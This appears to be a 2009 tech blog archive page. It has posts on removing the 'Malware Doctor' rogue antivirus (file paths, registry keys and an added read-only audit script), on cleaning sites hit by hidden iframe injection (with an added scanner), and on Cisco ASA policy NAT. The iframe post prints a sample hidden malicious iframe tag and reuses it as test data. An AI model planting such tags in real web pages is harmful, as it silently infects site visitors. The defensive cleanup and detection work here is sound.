Archive for August, 2009

Malware Doctor (or MalwareDoc) is one of the many scam "antivirus" tools found all over the Internet. It claims to help you get rid of viruses, but it is actually a virus itself. The picture below shows what Malware Doctor looks like.

Malware Doctor performs a "dummy" scan of your computer and reports that it found several viruses and malware on your computer. The program then recommends that you proceed with removal of the "dummy viruses". DO NOT proceed any further and DO NOT install Malware Doctor, because this program is actually a malicious virus itself. If you have already fallen into the trap of Malware Doctor, then you need to remove MalwareDoc as soon as possible. Once installed on your computer, this program will steal your sensitive information (credit cards, passwords etc.) and fully compromise your computer's security.

Malware Doctor Removal (The Hard Way)

To manually remove Malware Doctor you need to perform the following tasks. However, before continuing any further, back up your system and registry first. The following tasks can damage your computer, so be very careful and proceed only if you know what you are doing. Further down I also offer an easier way to remove Malware Doctor (scroll down if you want).

Step 1: Stop the following Malware Doctor processes
Malware Doctor.exe
MDsetup.exe
%ProgramFiles%\Malware Doctor\Malware Doctor.exe
%ProgramFiles%\Malware Doctor\unins000.exe

Step 2: Delete the following DLL files

%ProgramFiles%\Malware Doctor\htmlayout.dll
%ProgramFiles%\Malware Doctor\Validation.dll

Step 3: Uninstall and remove all Malware Doctor directories and files

%ProgramFiles%\Malware Doctor\
%\Documents and Settings%\All Users\Start Menu\Programs\Malware Doctor\Malware Doctor.lnk

Step 4: Delete all Malware Doctor folders

%\Documents and Settings%\All Users\Start Menu\Programs\Malware Doctor\
%ProgramFiles%\Malware Doctor\
%ProgramFiles%\Malware Doctor\GUI\

Step 5: Remove the following Registry values

HKEY_USERS\Software\Microsoft\Windows\Explorer\MenuOrder\Start Menu2\Programs\Malware Doctor
HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Uninstall\Malware Doctor
HKEY_CURRENT_USER\Software\Malware Doctor
HKEY_CURRENT_USER\Software\Malware Doctor\AntiSpy Knight
HKEY_LOCAL_MACHINE\SOFTWARE\Malware Doctor
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Malware Doctor_is1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run "Alcmtr"
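
As an added check (example code, not from the original post), the following Python script audits a host for the artifacts listed in Steps 2 to 5 without deleting anything, so the manual removal can be verified before and after. It assumes the post's "%\Documents and Settings%\All Users" path corresponds to %ALLUSERSPROFILE%, and it skips the HKEY_USERS entries because the post gives them without a user SID.

```python
# Added example (not from the original post): read-only audit of the Malware Doctor
# artifacts listed in Steps 2 to 5. Assumptions: the post's "%\Documents and Settings%\All
# Users" path is taken as %ALLUSERSPROFILE%; the HKEY_USERS entries (no SID) are omitted.
import os
import re

PATHS = [
    r"%ProgramFiles%\Malware Doctor\Malware Doctor.exe",
    r"%ProgramFiles%\Malware Doctor\unins000.exe",
    r"%ProgramFiles%\Malware Doctor\htmlayout.dll",
    r"%ProgramFiles%\Malware Doctor\Validation.dll",
    r"%ProgramFiles%\Malware Doctor\GUI",
    r"%ALLUSERSPROFILE%\Start Menu\Programs\Malware Doctor\Malware Doctor.lnk",
]
REG_KEYS = [
    r"HKEY_CURRENT_USER\Software\Malware Doctor",
    r"HKEY_CURRENT_USER\Software\Malware Doctor\AntiSpy Knight",
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Malware Doctor",
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Malware Doctor_is1",
]
RUN_KEY = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
RUN_VALUE = "Alcmtr"   # the Run value named in Step 5 (the autostart entry)

def expand(path, env):
    """Expand %VAR% placeholders case-insensitively, as cmd.exe does; unknown ones stay."""
    lookup = {k.lower(): v for k, v in env.items()}
    return re.sub(r"%([^%]+)%", lambda m: lookup.get(m.group(1).lower(), m.group(0)), path)

def split_key(full_key):
    """Split a full registry path into (hive name, subkey path)."""
    hive, _, subkey = full_key.partition("\\")
    return hive, subkey

def registry_present(full_key, value_name=None):
    """True if the key (and, if given, the named value under it) exists. Windows only."""
    import winreg
    hive, subkey = split_key(full_key)
    try:
        with winreg.OpenKey(getattr(winreg, hive), subkey) as key:
            if value_name is not None:
                winreg.QueryValueEx(key, value_name)
        return True
    except OSError:
        return False

def audit(env=os.environ):
    """Return the listed artifacts still present on this host (empty list when clean)."""
    found = ["path " + p for p in PATHS if os.path.exists(expand(p, env))]
    found += ["regkey " + k for k in REG_KEYS if registry_present(k)]
    if registry_present(RUN_KEY, RUN_VALUE):
        found.append(f"run value {RUN_VALUE} under {RUN_KEY}")
    return found
```

Call audit() on the affected Windows host; it returns an empty list once every listed artifact is gone.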

Malware Doctor Removal (The Easy Way)

Now, if you don't want to follow the hard manual way, there is an easier method to remove Malware Doctor automatically: download the FREE trial of the well-known Spyware Doctor software (from the software developer PCTools) and have it scan your computer. With the free trial you will not be able to remove Malware Doctor, but it will help you identify all infected files, which you can then remove manually yourself. However, if you register the program (it's around $30, I think) you will be able to remove Malware Doctor automatically without having to mess around with registry values and all that stuff. Download the free trial of Spyware Doctor here, or visit the Spyware Doctor website for more information.

Recently, thousands of legitimate websites have been hacked with the "iframe code injection" attack, resulting in Cross Site Scripting (XSS) for unsuspecting users, who get infected with malware when they visit those legitimate websites. What happens is that an iframe HTML tag is injected, usually at the end, into the "index.php" or "index.html" files of the legitimate website. This iframe embeds into the legitimate site malicious code which installs a virus on the visitor's PC or tries to steal sensitive information. The <iframe> HTML tag is used to embed content from another website into the current page. An injected iframe usually looks like the following:

<iframe src="http://some-malicious-web-url" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

The problem is usually not a vulnerability in the website itself; it is usually caused by a Trojan which infects the website owner's PC. The Trojan (maybe the MPack kit, released by Russians and sold for $1000) steals the website owner's FTP password and connects to the website as the FTP user, thus being able to upload and modify files on the website. After the website gets infected, Google usually flags the site as "This Site May Harm Your Computer", which harms the reputation of the website.

Some tips to clean the infection on your site:

  • First of all, scan and clean the computer you use to connect to your site. The Trojan might be undetectable by some antivirus products, so you are better off formatting Windows and installing a fresh copy.
  • Change ALL your passwords, most importantly the FTP passwords and the website control panel passwords.
  • Download all files from your website and store them in a safe place on your PC to further analyze the infection.
  • If you have a recent clean backup of your website, upload the backup files and replace all current files.
  • If you don't have a backup (shame on you!!), then edit all source code (HTML or PHP files) and search for <iframe> tags inside the code. Delete the suspicious <iframe> tags and re-upload all HTML and PHP files to your website.
  • Download an antivirus tool which scans the website for <iframe> content. If you use WordPress, there is an antivirus plugin for that which you can download directly from WordPress here.
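
As an added example (not the post's tool), the Python scanner below does what the last two tips describe: it walks a downloaded copy of the site and reports every <iframe> that is styled invisible, like the one shown above, or that points to a host other than the site's own. ALLOWED_HOSTS and SAMPLE are constructed for the example.

```python
# Added example (not the post's tool): scan html/php files for the hidden <iframe>
# pattern shown above. A frame is reported when it is styled invisible (1x1,
# visibility:hidden, display:none) or its src points off-site. ALLOWED_HOSTS and
# SAMPLE are constructed for this example.
import os
import re
from urllib.parse import urlparse

IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE | re.DOTALL)
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")
ALLOWED_HOSTS = {"www.example.com"}          # the site's own hosts (constructed)
SAMPLE = ('<p>Welcome</p>\n<iframe src="https://www.example.com/map" width="400" height="300"></iframe>\n'
          '<iframe src="http://some-malicious-web-url" width=1 height=1 '
          'style="visibility:hidden;position:absolute"></iframe>\n')

def parse_attrs(attr_text):
    """Tag attributes as a lower-cased dict; handles quoted and bare values."""
    return {m.group(1).lower(): (m.group(2) or m.group(3) or m.group(4) or "").strip()
            for m in ATTR_RE.finditer(attr_text)}

def is_hidden(attrs):
    """True for the 1x1 / visibility:hidden / display:none tricks that conceal a frame."""
    style = attrs.get("style", "").replace(" ", "").lower()
    tiny = any(attrs.get(k, "").rstrip("px") in ("0", "1") for k in ("width", "height"))
    return tiny or "visibility:hidden" in style or "display:none" in style

def is_offsite(src, allowed_hosts):
    host = urlparse(src).hostname              # None for relative URLs
    return host is not None and host.lower() not in allowed_hosts

def suspicious_iframes(text, allowed_hosts=ALLOWED_HOSTS):
    """Return (line_number, src, reasons) for every iframe in text worth a look."""
    findings = []
    for m in IFRAME_RE.finditer(text):
        attrs = parse_attrs(m.group(1))
        src = attrs.get("src", "")
        reasons = (["hidden"] if is_hidden(attrs) else []) + (["offsite"] if is_offsite(src, allowed_hosts) else [])
        if reasons:
            findings.append((text.count("\n", 0, m.start()) + 1, src, reasons))
    return findings

def scan_tree(root, allowed_hosts=ALLOWED_HOSTS, exts=(".html", ".htm", ".php")):
    """Walk a downloaded copy of the site and map each affected file to its findings."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for path in (os.path.join(dirpath, n) for n in files if n.lower().endswith(exts)):
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = suspicious_iframes(fh.read(), allowed_hosts)
            if hits:
                report[path] = hits
    return report
```

Point scan_tree() at the folder holding the downloaded site files and review each reported line before deleting anything.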

Redirected from ciscoasa.com

I'm the owner of the ciscoasa.com blog, which I have decided to move over to this website. All content from ciscoasa.com is now available at the new domain tech21century.com. This new website will be enriched with content spanning a wider range of topics about Cisco networks and additional general technology topics and information. The IT world and technology in general are fascinating, so I feel excited about starting a new online presence such as this new blog and writing about the stuff I love.

Policy NAT on Cisco ASA Firewall

As we know, conventional NAT on Cisco devices (routers, ASA firewalls etc.) translates the SOURCE IP address to something else. There is also the so-called "destination-based NAT" (you may also see it referred to as "reverse NAT"), which changes the destination IP address. Here we will deal with conventional source-based NAT with a policy.

Sometimes we need to change the source IP address to one translated address (let's call it "translated-A") when communicating with "destination-A", and to a different address ("translated-B") when communicating with "destination-B".

So, to be clearer, the scenario is the following:


  • When internal host 192.168.1.1 wants to communicate with external host 100.100.100.1, then the internal host must be translated to 50.50.50.1
  • When the internal host 192.168.1.1 wants to communicate with external host 200.200.200.1, then the internal host must be translated to 50.50.50.2

We can achieve the functionality above with policy-based NAT.

Configuration Example:

Assume that the internal host 192.168.1.1 is connected to the inside interface of the ASA. We also have in our possession the public IP range 50.50.50.0/24, which we will use to translate our internal host according to the destination.

! First create the access lists that select the traffic for each policy NAT rule
ASA(config)# access-list POLICYNAT-A extended permit ip host 192.168.1.1 host 100.100.100.1
ASA(config)# access-list POLICYNAT-B extended permit ip host 192.168.1.1 host 200.200.200.1

! Now create the static policy NAT translation for Destination-A
ASA(config)# static (inside,outside) 50.50.50.1 access-list POLICYNAT-A

! Now create the static policy NAT translation for Destination-B
ASA(config)# static (inside,outside) 50.50.50.2 access-list POLICYNAT-B

The above commands do the following: when the source address is 192.168.1.1 and the destination address is 100.100.100.1, the source address is changed to 50.50.50.1.

Similarly, when the source address is 192.168.1.1 and the destination is 200.200.200.1, the source address is changed to 50.50.50.2.

The above static NAT commands take effect only if the traffic is between the hosts referenced in the access lists (either inbound or outbound traffic).
